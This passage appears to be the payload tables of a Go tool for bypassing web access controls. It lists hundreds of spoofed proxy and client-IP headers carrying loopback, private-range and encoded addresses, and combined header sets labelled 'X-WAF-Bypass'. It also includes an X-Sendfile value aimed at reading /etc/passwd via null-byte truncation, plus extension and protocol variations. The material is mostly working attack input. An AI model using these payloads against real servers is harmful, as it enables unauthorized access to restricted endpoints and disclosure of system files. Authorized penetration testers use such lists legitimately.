		{"X-Original-Forwarded-For": ""},
		{"X-Original-Host": "127.0.0.1"},
		{"X-Original-Hostname": ""},
		{"X-Original-IP": "127.0.0.1"},
		{"X-Original-Path": ""},
		{"X-Original-Remote-Addr": "127.0.0.1"},
		{"X-Original-URL": "{{baseURL}}"},
		{"X-Original-URL": "*"},
		{"X-Original-URL": "null"},
		{"X-Original-URL": "norealhost"},
		{"X-Original-URL": "0"},
		{"X-Original-URL": "0177.0000.0000.0001"},
		{"X-Original-URL": "0x7F000001"},
		{"X-Original-URL": "10.0.0.0"},
		{"X-Original-URL": "10.0.0.1"},
		{"X-Original-URL": "127.0.0.1"},
		{"X-Original-URL": "127.0.0.1:80"},
		{"X-Original-URL": "127.0.0.1:443"},
		{"X-Original-URL": "127.1"},
		{"X-Original-URL": "172.16.0.0"},
		{"X-Original-URL": "172.16.0.1"},
		{"X-Original-URL": "192.168.1.0"},
		{"X-Original-URL": "192.168.1.1"},
		{"X-Original-URL": "2130706433"},
		{"X-Original-URL": "localhost"},
		{"X-Original-URL": "localhost:80"},
		{"X-Original-URL": "localhost:443"},
		{"X-Original-IP": ""},
		{"X-Original-Remote-Addr": "127.0.0.1"},
		{"X-Original-Url": "127.0.0.1"},
		{"X-Original-URL": "{{baseURL}}"},
		{"X-Original-URI": ""},
		{"X-Originally-Forwarded-For": "127.0.0.1"},
		{"X-Originating": "127.0.0.1"},
		{"X-Originating-Host": ""},
		{"X-Originating-IP": "*"},
		{"X-Originating-IP": "null"},
		{"X-Originating-IP": "norealhost"},
		{"X-Originating-IP": "0"},
		{"X-Originating-IP": "0177.0000.0000.0001"},
		{"X-Originating-IP": "0x7F000001"},
		{"X-Originating-IP": "10.0.0.0"},
		{"X-Originating-IP": "10.0.0.1"},
		{"X-Originating-IP": "127.0.0.1"},
		{"X-Originating-IP": "127.0.0.1:80"},
		{"X-Originating-IP": "127.0.0.1:443"},
		{"X-Originating-IP": "127.1"},
		{"X-Originating-IP": "172.16.0.0"},
		{"X-Originating-IP": "172.16.0.1"},
		{"X-Originating-IP": "192.168.1.0"},
		{"X-Originating-IP": "192.168.1.1"},
		{"X-Originating-IP": "2130706433"},
		{"X-Originating-IP": "localhost"},
		{"X-Originating-IP": "localhost:80"},
		{"X-Originating-IP": "localhost:443"},
		{"X-Override-URL": "{{baseURL}}"},
		{"X-Path": ""},
		{"X-Port": ""},
		{"X-Protocol-Port": ""},
		{"X-Protocol-Scheme": ""},
		{"X-Proxy": ""},
		{"X-Proxy-IP": ""},
		{"X-Proxy-Request": ""},
		{"X-Proxy-URL": ""},
		{"X-ProxyMesh-IP": "127.0.0.1"},
		{"X-ProxyUser-IP": "*"},
		{"X-ProxyUser-IP": "null"},
		{"X-ProxyUser-IP": "norealhost"},
		{"X-ProxyUser-IP": "0"},
		{"X-ProxyUser-IP": "0177.0000.0000.0001"},
		{"X-ProxyUser-IP": "0x7F000001"},
		{"X-ProxyUser-IP": "10.0.0.0"},
		{"X-ProxyUser-IP": "10.0.0.1"},
		{"X-ProxyUser-IP": "127.0.0.1"},
		{"X-ProxyUser-IP": "127.0.0.1:80"},
		{"X-ProxyUser-IP": "127.0.0.1:443"},
		{"X-ProxyUser-IP": "127.1"},
		{"X-ProxyUser-IP": "172.16.0.0"},
		{"X-ProxyUser-IP": "172.16.0.1"},
		{"X-ProxyUser-IP": "192.168.1.0"},
		{"X-ProxyUser-IP": "192.168.1.1"},
		{"X-ProxyUser-IP": "2130706433"},
		{"X-ProxyUser-IP": "localhost"},
		{"X-ProxyUser-IP": "localhost:80"},
		{"X-ProxyUser-IP": "localhost:443"},
		{"X-Proxy-Url": "127.0.0.1"},
		{"X-Proxy-Url": "127.0.0.1"},
		{"X-ProxyUser-IP": "127.0.0.1"},
		{"X-Real-Client-IP": ""},
		{"X-Real-IP": "*"},
		{"X-Real-IP": "null"},
		{"X-Real-IP": "norealhost"},
		{"X-Real-IP": "0"},
		{"X-Real-IP": "0177.0000.0000.0001"},
		{"X-Real-IP": "0x7F000001"},
		{"X-Real-IP": "10.0.0.0"},
		{"X-Real-IP": "10.0.0.1"},
		{"X-Real-IP": "12.34.56.78"},
		{"X-Real-IP": "127.0.0.111111"},
		{"X-Real-IP": "127.0.0.1"},
		{"X-Real-IP": "127.0.0.1:80"},
		{"X-Real-IP": "127.0.0.1:443"},
		{"X-Real-IP": "127.1"},
		{"X-Real-IP": "172.16.0.0"},
		{"X-Real-IP": "172.16.0.1"},
		{"X-Real-IP": "192.168.1.0"},
		{"X-Real-IP": "192.168.1.1"},
		{"X-Real-IP": "2130706433"},
		{"X-Real-IP": "localhost"},
		{"X-Real-IP": "localhost:80"},
		{"X-Real-IP": "localhost:443"},
		{"X-Referer": ""},
		{"X-Referrer": ""},
		{"X-Remote-Addr": "*"},
		{"X-Remote-Addr": "null"},
		{"X-Remote-Addr": "norealhost"},
		{"X-Remote-Addr": "0"},
		{"X-Remote-Addr": "0177.0000.0000.0001"},
		{"X-Remote-Addr": "0x7F000001"},
		{"X-Remote-Addr": "10.0.0.0"},
		{"X-Remote-Addr": "10.0.0.1"},
		{"X-Remote-Addr": "127.0.0.1"},
		{"X-Remote-Addr": "127.0.0.1:80"},
		{"X-Remote-Addr": "127.0.0.1:443"},
		{"X-Remote-Addr": "127.1"},
		{"X-Remote-Addr": "172.16.0.0"},
		{"X-Remote-Addr": "172.16.0.1"},
		{"X-Remote-Addr": "192.168.1.0"},
		{"X-Remote-Addr": "192.168.1.1"},
		{"X-Remote-Addr": "2130706433"},
		{"X-Remote-Addr": "localhost"},
		{"X-Remote-Addr": "localhost:80"},
		{"X-Remote-Addr": "localhost:443"},
		{"X-Remote-Host": ""},
		{"X-Remote-IP": "*"},
		{"X-Remote-IP": "null"},
		{"X-Remote-IP": "norealhost"},
		{"X-Remote-IP": "0"},
		{"X-Remote-IP": "0177.0000.0000.0001"},
		{"X-Remote-IP": "0x7F000001"},
		{"X-Remote-IP": "10.0.0.0"},
		{"X-Remote-IP": "10.0.0.1"},
		{"X-Remote-IP": "127.0.0.1"},
		{"X-Remote-IP": "127.0.0.1:80"},
		{"X-Remote-IP": "127.0.0.1:443"},
		{"X-Remote-IP": "127.1"},
		{"X-Remote-IP": "172.16.0.0"},
		{"X-Remote-IP": "172.16.0.1"},
		{"X-Remote-IP": "192.168.1.0"},
		{"X-Remote-IP": "192.168.1.1"},
		{"X-Remote-IP": "2130706433"},
		{"X-Remote-IP": "localhost"},
		{"X-Remote-IP": "localhost:80"},
		{"X-Remote-IP": "localhost:443"},
		{"X-Requested-By": ""},
		{"X-Requested-For": ""},
		{"X-Rewrite-URL": "{{baseURL}}"},
		{"X-Rewrite-URL": "*"},
		{"X-Rewrite-URL": "null"},
		{"X-Rewrite-URL": "norealhost"},
		{"X-Rewrite-URL": "0"},
		{"X-Rewrite-URL": "0177.0000.0000.0001"},
		{"X-Rewrite-URL": "0x7F000001"},
		{"X-Rewrite-URL": "10.0.0.0"},
		{"X-Rewrite-URL": "10.0.0.1"},
		{"X-Rewrite-URL": "127.0.0.1"},
		{"X-Rewrite-URL": "127.0.0.1:80"},
		{"X-Rewrite-URL": "127.0.0.1:443"},
		{"X-Rewrite-URL": "127.1"},
		{"X-Rewrite-URL": "172.16.0.0"},
		{"X-Rewrite-URL": "172.16.0.1"},
		{"X-Rewrite-URL": "192.168.1.0"},
		{"X-Rewrite-URL": "192.168.1.1"},
		{"X-Rewrite-URL": "2130706433"},
		{"X-Rewrite-URL": "localhost"},
		{"X-Rewrite-URL": "localhost:80"},
		{"X-Rewrite-URL": "localhost:443"},
		{"X-Route-Request": ""},
		{"X-Served-By": ""},
		{"X-Server": ""},
		{"X-Server-IP": ""},
		{"X-Server-Name": ""},
		{"X-Sp-Edge-Host": ""},
		{"X-Sp-Edge-Scheme": ""},
		{"X-Sp-Forwarded-IP": ""},
		{"X-Sendfile": ""},
		{"X-True-Client": ""},
		{"X-True-Client-IP": "127.0.0.1"},
		{"X-True-IP": "127.0.0.1"},
		{"X-Trusted-IP": ""},
		{"X-URI": ""},
		{"X-URL": ""},
		{"X-Url-Scheme": ""},
		{"X-WAP-Profile ": "127.0.0.1"},
		{"X-WAP-Network-Client-IP": ""},
		{"X-Waws-Unencoded-URL": ""},
		{"X-YWBCLO-UIP": ""},
		{"Z-Forwarded-For": "127.0.0.1"},
		{"ZCACHE-CONTROL": "127.0.0.1"},
		{"X-Api-Version": "999"}, 
		{"X-Forwarded-Prefix": "{{baseURL}}"},
	},

	HeaderCombinations: []map[string]map[string]string{
		{
			"headers": {
				"Akamai-Origin-Hop": "1",
				"True-Client-IP":    "127.0.0.1",
			},
		},
		{
			"headers": {
				"CF-Connecting-IP": "127.0.0.1",
				"CF-Visitor":       "https",
			},
		},
		{
			"headers": {
				"Client-IP":  "127.0.0.1",
				"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
			},
		},
		{
			"headers": {
				"Client-IP":       "%31%32%37%2E%30%2E%30%2E%31",
				"X-Forwarded-For": "0x7F.0x00.0x00.0x01",
			},
		},
		{
			"headers": {
				"Fastly-Client-IP": "127.0.0.1",
				"X-Served-By":      "{{internalNetwork}}",
			},
		},
		{
			"headers": {
				"Forwarded":         "for=10.0.0.1",
				"X-Cluster-Client-IP": "10.0.0.1",
			},
		},
		{
			"headers": {
				"Forwarded": "for=127.0.0.1",
				"User-Agent": "curl/7.64.1",
			},
		},
		{
			"headers": {
				"Forwarded": "for=127.0.0.1",
				"Via":       "1.1 localhost",
			},
		},
		{
			"headers": {
				"Forwarded":         "for=127.0.0.1",
				"X-Forwarded-For":   "8.8.8.8",
			},
		},
		{
			"headers": {
				"Forwarded":         "for=%7F%2E%30%2E%30%2E%31",
				"X-Client-IP":       "2130706433",
			},
		},
		{
			"headers": {
				"Host":    "127.0.0.1",
				"Referer": "localhost",
			},
		},
		{
			"headers": {
				"Host":    "127.0.0.1",
				"Referer": "https://www.google.com",
			},
		},
		{
			"headers": {
				"Host":    "127%2E0%2E0%2E1",
				"Referer": "localhost",
			},
		},
		{
			"headers": {
				"Host":    "192.168.1.1",
				"Referer": "{{internalNetwork}}",
			},
		},
		{
			"headers": {
				"Host":    "{{base}}",
				"Referer": "https://www.google.com",
			},
		},
		{
			"headers": {
				"Referer":         "{{internalNetwork}}",
				"X-Originating-IP": "127.0.0.1",
			},
		},
		{
			"headers": {
				"True-Client-IP": "127.0.0.1",
				"Client-IP":      "192.168.1.1",
			},
		},
		{
			"headers": {
				"X-Forwarded-For": "10.0.0.1, 127.0.0.1",
				"True-Client-IP":  "127.0.0.1",
			},
		},
		{
			"headers": {
				"X-Forwarded-For": "127.0.0.1",
				"Client-IP":       "8.8.8.8",
			},
		},
		{
			"headers": {
				"X-Forwarded-For": "127.0.0.1",
				"User-Agent":      "PostmanRuntime/7.28.4",
			},
		},
		{
			"headers": {
				"X-Forwarded-For": "127.0.0.1",
				"X-Client-IP":     "192.168.1.1",
			},
		},
		{
			"headers": {
				"X-Forwarded-Host": "{{internalNetwork}}",
				"X-Client-IP":      "127.0.0.1",
			},
		},
		{
			"headers": {
				"X-Forwarded-Proto": "https",
				"Forwarded":         "for=192.168.1.1",
			},
		},
		{
			"headers": {
				"X-Original-URL": "{{baseURL}}",
				"X-Accel-Redirect": "{{bypassURL}}",
			},
		},
		{
			"headers": {
				"X-Original-URL": "{{baseURL}}",
				"X-Rewrite-URL":   "{{bypassURL}}",
			},
		},
		{
			"headers": {
				"X-Real-IP": "10.0.0.1",
				"Forwarded": "for=192.168.0.1",
			},
		},
		{
			"headers": {
				"X-Real-IP": "127.0.0.1",
				"Via":       "1.1 proxy.server",
			},
		},
		{
			"headers": {
				"X-Sendfile":     "/etc/passwd%00",
				"X-Rewrite-URL": "{{baseURL}}",
			},
		},
		{
			"headers": {
				"X-WAF-Bypass": "127.0.0.1",
				"Via":          "1.1 trusted.proxy",
			},
		},
		{
			"headers": {
				"X-WAF-Bypass": "true",
				"Client-IP":    "127.0.0.1",
			},
		},
		{
			"headers": {
				"X-Forwarded-For": "127.0.0.1",
				"X-Client-IP":     "127.0.0.1",
			},
		},
		{
			"headers": {
				"X-Forwarded-Host": "127.0.0.1",
				"Host":             "127.0.0.1",
			},
		},
		{
			"headers": {
				"X-Real-IP":       "127.0.0.1",
				"CF-Connecting-IP": "127.0.0.1",
				"True-Client-IP":   "127.0.0.1",
			},
		},
		{
			"headers": {
				"X-Original-URL": "{{baseURL}}",
				"Referer":        "http://localhost",
			},
		},
		{
			"headers": {
				"Forwarded": "for=127.0.0.1",
				"Via":       "1.1 proxy",
			},
		},
		{
			"headers": {
				"X-WAF-Bypass": "true",
				"X-Rewrite-URL": "{{baseURL}}",
				"Base-Url": "127.0.0.1",
			},
		},
},


	ExtensionInjection: []string{
		".php",
		".php.old",
		".js",
		".jsp",
		".json",
		".html",
		".khtml",
		".xhtml",
		".asp",
		".aspx",
	},

	Protocols: []string{
		"HTTP/3", "HTTP/2", "HTTP/1.1", "HTTP/1.0", "HTTP/0.9",
},
}

